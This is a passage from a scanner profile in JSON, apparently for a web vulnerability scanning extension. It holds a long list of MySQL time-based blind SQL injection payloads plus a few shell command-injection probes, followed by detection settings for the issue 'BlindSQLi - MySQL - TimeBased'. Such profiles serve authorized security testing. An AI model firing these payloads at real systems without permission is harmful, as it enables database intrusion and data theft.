      "true,\" OR (SELECT 1337 FROM (SELECT(SLEEP(15)))YYYY) OR \"1337\" LIKE \"1337",
      "true,\u0027 OR (SELECT 1337 FROM (SELECT(SLEEP(15)))YYYY) OR \u00271337\u0027\u003d\u00271337",
      "true,\u0027) WHERE 1337\u003d1337 OR (SELECT 1337 FROM (SELECT(SLEEP(15)))YYYY)-- 1337",
      "true,\") WHERE 1337\u003d1337 OR (SELECT 1337 FROM (SELECT(SLEEP(15)))YYYY)-- 1337",
      "true,or sleep 15--",
      "true,or sleep 15",
      "true,or sleep(15)--",
      "true,or sleep(15)",
      "true,or SELECT SLEEP(15); #",
      "true,or SLEEP(15)",
      "true,or SLEEP(15)#",
      "true,or SLEEP(15)--",
      "true,or SLEEP(15)\u003d\"",
      "true,or SLEEP(15)\u003d\u0027",
      "true,\u0027 OR SLEEP(15)#",
      "true,\" OR SLEEP(15)#",
      "true,\u0027) OR SLEEP(15)#",
      "true,\u0027)) or sleep(15)\u003d\u0027",
      "true,\" or sleep(15)#",
      "true,1) or sleep(15)#",
      "true,)) or sleep(15)\u003d\u0027",
      "true,1)) or sleep(15)#",
      "true,or sleep(15)#",
      "true,%20\u0027sleep%20150\u0027",
      "true,%20$(sleep%20150)",
      "true,\")) or sleep(15)\u003d\"",
      "true,or sleep(15)\u003d\u0027",
      "true,\") or sleep(15)\u003d\"",
      "true,) or sleep(15)\u003d\u0027",
      "true,1 or sleep(15)#",
      "true,RLIKE SLEEP(15)--",
      "true,\u0027 RLIKE SLEEP(15)--",
      "true,\u0027 RLIKE SLEEP(15)-- 1337",
      "true,\" RLIKE SLEEP(15)-- 1337",
      "true,\u0027) RLIKE SLEEP(15)-- 1337",
      "true,\u0027) RLIKE SLEEP(15) AND (\u00271337\u0027\u003d\u00271337",
      "true,\u0027)) RLIKE SLEEP(15) AND ((\u00271337\u0027\u003d\u00271337",
      "true,\u0027))) RLIKE SLEEP(15) AND (((\u00271337\u0027\u003d\u00271337",
      "true,) RLIKE SLEEP(15)-- 1337",
      "true,) RLIKE SLEEP(15) AND (1337\u003d1337",
      "true,)) RLIKE SLEEP(15) AND ((1337\u003d1337",
      "true,))) RLIKE SLEEP(15) AND (((1337\u003d1337",
      "true,1 RLIKE SLEEP(15)",
      "true,1 RLIKE SLEEP(15)-- 1337",
      "true,1 RLIKE SLEEP(15)# 1337",
      "true,) WHERE 1337\u003d1337 RLIKE SLEEP(15)-- 1337",
      "true,1 WHERE 1337\u003d1337 RLIKE SLEEP(15)-- 1337",
      "true,+(SELECT 1337 WHERE 1337\u003d1337 RLIKE SLEEP(15))+",
      "true,)) AS 1337 WHERE 1337\u003d1337 RLIKE SLEEP(15)-- 1337",
      "true,) AS 1337 WHERE 1337\u003d1337 RLIKE SLEEP(15)-- 1337",
      "true,` WHERE 1337\u003d1337 RLIKE SLEEP(15)-- 1337",
      "true,`) WHERE 1337\u003d1337 RLIKE SLEEP(15)-- 1337",
      "true,\u0027 RLIKE SLEEP(15) AND \u00271337\u0027\u003d\u00271337",
      "true,\u0027) RLIKE SLEEP(15) AND (\u00271337\u0027 LIKE \u00271337",
      "true,\u0027)) RLIKE SLEEP(15) AND ((\u00271337\u0027 LIKE \u00271337",
      "true,\u0027))) RLIKE SLEEP(15) AND (((\u00271337\u0027 LIKE \u00271337",
      "true,%\u0027 RLIKE SLEEP(15) AND \u00271337%\u0027\u003d\u00271337",
      "true,\u0027 RLIKE SLEEP(15) AND \u00271337\u0027 LIKE \u00271337",
      "true,\") RLIKE SLEEP(15) AND (\"1337\"\u003d\"1337",
      "true,\")) RLIKE SLEEP(15) AND ((\"1337\"\u003d\"1337",
      "true,\"))) RLIKE SLEEP(15) AND (((\"1337\"\u003d\"1337",
      "true,\" RLIKE SLEEP(15) AND \"1337\"\u003d\"1337",
      "true,\") RLIKE SLEEP(15) AND (\"1337\" LIKE \"1337",
      "true,\")) RLIKE SLEEP(15) AND ((\"1337\" LIKE \"1337",
      "true,\"))) RLIKE SLEEP(15) AND (((\"1337\" LIKE \"1337",
      "true,\" RLIKE SLEEP(15) AND \"1337\" LIKE \"1337",
      "true,\u0027 RLIKE SLEEP(15) OR \u00271337\u0027\u003d\u00271337",
      "true,\u0027) WHERE 1337\u003d1337 RLIKE SLEEP(15)-- 1337",
      "true,\") WHERE 1337\u003d1337 RLIKE SLEEP(15)-- 1337",
      "true,\u0027 WHERE 1337\u003d1337 RLIKE SLEEP(15)-- 1337",
      "true,\" WHERE 1337\u003d1337 RLIKE SLEEP(15)-- 1337"
    ],
    "Encoder": [
      "URL-encode key characters"
    ],
    "UrlEncode": true,
    "CharsToUrlEncode": "#",
    "Grep": [],
    "Tags": [
      "SQLi",
      "All"
    ],
    "PayloadResponse": false,
    "NotResponse": false,
    "TimeOut1": "14",
    "TimeOut2": "20",
    "isTime": false,
    "contentLength": "",
    "iscontentLength": false,
    "CaseSensitive": false,
    "ExcludeHTTP": false,
    "OnlyHTTP": false,
    "IsContentType": false,
    "ContentType": "",
    "HttpResponseCode": "",
    "NegativeCT": false,
    "IsResponseCode": false,
    "ResponseCode": "",
    "NegativeRC": false,
    "urlextension": "",
    "isurlextension": false,
    "NegativeUrlExtension": false,
    "MatchType": 5,
    "Scope": 0,
    "RedirType": 0,
    "MaxRedir": 0,
    "payloadPosition": 2,
    "payloadsFile": "",
    "grepsFile": "",
    "IssueName": "BlindSQLi - MySQL - TimeBased",
    "IssueSeverity": "High",
    "IssueConfidence": "Certain",
    "IssueDetail": "",
    "RemediationDetail": "",
    "IssueBackground": "",
    "RemediationBackground": "",
    "Header": [],
    "VariationAttributes": [],
    "InsertionPointType": [
      18,
      65,
      32,
      36,
      7,
      1,
      2,
      6,
      33,
      5,
      35,
      34,
      64,
      0,
      3,
      4,
      37,
      127,
      65,
      32,
      36,
      7,
      1,
      2,
      6,
      33,
      5,
      35,
      34,
      64,
      0,
      3,
      4,
      37,
      127
    ],
    "Scanas": false,
    "Scantype": 0,
    "pathDiscovery": false
  }
]